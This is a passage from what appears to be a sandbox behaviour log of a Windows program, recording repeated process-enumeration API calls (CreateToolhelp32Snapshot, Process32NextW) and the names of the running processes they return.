cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0130.198] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0130.199] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0130.200] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0130.201] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0130.202] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0130.203] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0130.205] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0130.206] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0130.293] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0130.294] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0130.295] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0130.296] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0130.297] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0130.298] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0130.299] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0130.301] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0130.302] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.303] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0130.304] CloseHandle (hObject=0xc4) returned 1 [0130.304] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0130.309] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.310] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0130.310] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0130.311] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0130.312] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0130.312] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0130.313] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0130.314] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0130.314] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0130.315] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0130.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.317] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.319] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0130.320] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.320] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.321] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0130.322] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.323] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0130.324] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0130.325] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0130.326] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0130.328] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.329] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0130.330] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0130.331] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0130.340] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0130.341] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0130.342] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0130.343] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0130.345] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0130.346] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0130.347] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0130.348] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0130.349] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0130.351] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0130.352] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0130.354] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0130.355] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0130.357] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0130.358] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0130.359] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0130.361] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0130.362] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0130.364] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.365] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0130.366] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0130.368] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0130.369] CloseHandle (hObject=0xbc) returned 1 [0130.369] Sleep (dwMilliseconds=0x12c) [0130.795] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0130.801] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.802] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0130.802] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0130.803] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0130.804] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0130.805] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0130.805] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0130.806] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0130.807] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0130.807] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0130.808] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.809] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.809] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.810] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 